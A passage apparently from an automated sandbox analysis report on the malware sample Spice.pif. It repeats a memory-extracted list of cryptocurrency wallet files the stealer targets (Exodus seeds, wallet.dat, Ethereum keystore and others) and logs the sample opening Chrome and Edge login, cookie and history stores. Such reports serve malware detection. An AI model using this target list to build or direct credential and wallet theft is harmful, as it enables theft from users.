Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
